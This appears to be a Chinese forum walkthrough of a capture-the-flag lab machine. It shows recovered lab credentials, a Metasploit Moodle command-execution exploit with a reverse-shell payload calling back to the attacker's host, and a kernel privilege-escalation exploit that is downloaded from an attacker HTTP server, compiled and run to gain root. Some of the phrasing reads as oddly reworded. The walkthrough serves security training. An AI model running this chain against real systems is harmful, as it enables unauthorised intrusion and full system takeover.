<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·得到一个新用户:</span><span style="color: black;">dr_doak</span><span style="color: black;">,</span><span style="color: black;">4England!</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·<span style="color: black;">运用</span>新用户再次登录</span><span style="color: black;">CMS</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·得到一个路径:</span><span style="color: black;">/dir007key/for-007.jpg</span><span style="color: black;">(以及暗示管理员</span><span style="color: black;">admin</span><span style="color: black;">)</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·下载<span style="color: black;">照片</span>后,<span style="color: black;">照片</span>属性存在</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·</span><span style="color: black;">eFdpbnRlcjE5OTV4IQ== </span><span style="color: black;">,经过</span><span style="color: black;">base64</span><span style="color: black;">解码:</span></span><span style="color: black;">xWinter1995x!</span><span style="color: black;">(</span><span style="color: black;"><span style="color: black;">应该是</span><span style="color: black;">admin</span><span style="color: black;"><span style="color: black;">秘码</span></span></span><span style="color: black;">)</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·<span style="color: black;">运用</span>admin登录CMS</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·<span style="color: black;">发掘</span>有2.2.3,<span style="color: black;">况且</span><span style="color: black;">运用</span>了<span style="color: black;">研发</span>模块Moodle(用插件看(<span style="color: black;">然则</span><span style="color: black;">无</span>版本号)<span style="color: black;">或</span>在首页最下面有框架信息)</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><strong style="color: blue;"><span style="color: black;"><span style="color: black;">3、</span>getshell</span></strong></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·</span></span><span style="color: black;">搜索框架对应的exp</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·<span style="color: black;">运用</span>远程代码执行(</span><span style="color: black;">RCE</span><span style="color: black;">)漏洞利用</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">1<span style="color: black;">、</span></span><span style="color: black;">msfconsole</span><span style="color: black;"> ---</span><span style="color: black;"><span style="color: black;">进入</span></span><span style="color: black;">MSF</span><span style="color: black;"><span style="color: black;">框架攻击界面</span> </span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">2<span style="color: black;">、</span></span><span style="color: black;">search moodle ---</span><span style="color: black;"><span style="color: black;"><span style="color: black;">查询</span></span></span><span style="color: black;"> moodle</span><span style="color: black;"><span style="color: black;">类型</span></span><span style="color: black;"><span style="color: black;">攻击的模块</span> </span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">3</span><span style="color: black;">、</span></span><span style="color: black;">use 1 ---</span><span style="color: black;"><span style="color: black;">调用</span></span><span style="color: black;">1 exploit/multi/http/moodle_cmd_exec</span><span style="color: black;"><span style="color: black;">调用攻击脚</span> <span style="color: black;">本</span> </span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">4</span><span style="color: black;">、</span></span><span style="color: black;">set username admin ---</span><span style="color: black;"><span style="color: black;">设置用户名:</span></span><span style="color: black;">admin</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">5</span><span style="color: black;">、</span></span><span style="color: black;">set password xWinter1995x! ---</span><span style="color: black;"><span style="color: black;">设置<span style="color: black;">秘码</span>:</span></span><span style="color: black;">xWinter1995x!</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">6</span><span style="color: black;">、</span></span><span style="color: black;">set rhost</span><span style="color: black;"><span style="color: black;">s</span></span><span style="color: black;">severnaya-station.com ---</span><span style="color: black;"><span style="color: black;">设置:</span></span><span style="color: black;">rhosts severnaya-station.com</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">7</span><span style="color: black;">、</span></span><span style="color: black;">set targeturi /gnocertdir ---</span><span style="color: black;"><span style="color: black;">设置目录:</span></span><span style="color: black;"> /gnocertdir</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">8</span><span style="color: black;">、</span></span><span style="color: black;">set payload cmd/unix/reverse ---</span><span style="color: black;"><span style="color: black;">设置</span></span><span style="color: black;">payload</span><span style="color: black;"><span style="color: black;">:</span></span><span style="color: black;">cmd/unix/reverse</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">9</span><span style="color: black;">、</span></span><span style="color: black;">set lhost 192.168.</span><span style="color: black;"><span style="color: black;">153.142</span></span><span style="color: black;"> ---</span><span style="color: black;"><span style="color: black;">设置:</span></span><span style="color: black;">lhost 192.168.</span><span style="color: black;"><span style="color: black;">153.142</span></span><span style="color: black;"><span style="color: black;">(</span></span><span style="color: black;"><span style="color: black;">通常</span><span style="color: black;">便是</span>自己的主机</span><span style="color: black;"><span style="color: black;">)</span> </span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">10</span><span style="color: black;">、</span></span><span style="color: black;">exploit ----</span><span style="color: black;"><span style="color: black;">执行命令</span></span><span style="color: black;">(</span><span style="color: black;"><span style="color: black;">或</span><span style="color: black;">run</span></span><span style="color: black;">)</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·这个exp默认<span style="color: black;">运用</span></span><span style="color: black;">4444</span><span style="color: black;">端口(<span style="color: black;">能够</span>用options查看一下payload)</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·<span style="color: black;">因为</span><span style="color: black;">运用</span>的是</span><span style="color: black;">powershell</span><span style="color: black;">命令,<span style="color: black;">因此</span>修改(搜索查到的<span style="color: black;">这儿</span>又利用点)</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·再次执行</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·拿到shell</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><strong style="color: blue;"><span style="color: black;"><span style="color: black;">4、</span>提权</span></strong></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·</span><span style="color: black;">uname -a</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">·<span style="color: black;">能够</span>内核提权</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·</span><span style="color: black;">searchsploit 3.13.0</span><span style="color: black;"><span style="color: black;">#搜索exp<span style="color: black;">(</span><span style="color: black;"><span style="color: black;">亦</span><span style="color: black;">能够</span>搜索</span></span><span style="color: black;">ubuntu</span><span style="color: black;">?<span style="color: black;">能够</span>试试<span style="color: black;">)</span></span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·</span><span style="color: black;">cd /usr/share/exploitdb/exploits/linux/local</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·</span><span style="color: black;">cp 37292.c /root/<span style="color: black;">桌面</span><span style="color: black;">/ </span></span><span style="color: black;">#复制exp</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">·编辑</span><span style="color: black;">37292.c</span><span style="color: black;"><span style="color: black;">(<span style="color: black;">由于</span><span style="color: black;">目的</span>靶机<span style="color: black;">无</span></span><span style="color: black;">gcc</span><span style="color: black;">环境,<span style="color: black;">能够</span><span style="color: black;">运用</span></span><span style="color: black;">cc</span><span style="color: black;">编译)(行数<span style="color: black;">表示</span>:</span><span style="color: black;">ESC</span><span style="color: black;">后,输入“</span><span style="color: black;">:set number</span><span style="color: black;">”)</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·开启</span><span style="color: black;">http</span><span style="color: black;">服务,<span style="color: black;">目的</span>靶机下载代码(<span style="color: black;">目的</span>靶机<span style="color: black;">能够</span>先到</span><span style="color: black;">/tmp</span><span style="color: black;">目录再下载)</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;"><span style="color: black;">cc -o exp 37292.c ---C</span><span style="color: black;">语言的</span><span style="color: black;">CC</span><span style="color: black;">代码编译点</span><span style="color: black;">c</span><span style="color: black;">文件</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;"><span style="color: black;">chmod +x exp ---</span><span style="color: black;">添加执行权限</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;"><span style="color: black;">./exp ---</span><span style="color: black;">点杠执行</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <span style="color: black;"><span style="color: black;">id ---</span><span style="color: black;">查看<span style="color: black;">日前</span>权限</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">·<span style="color: black;">发掘</span>权限变成</span><span style="color: black;">root</span></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">这个靶机<span style="color: black;">能够</span>在github上找,<span style="color: black;">倘若</span>没找到私信我</p>
“NB”(牛×的缩写,表示叹为观止)
页:
[1]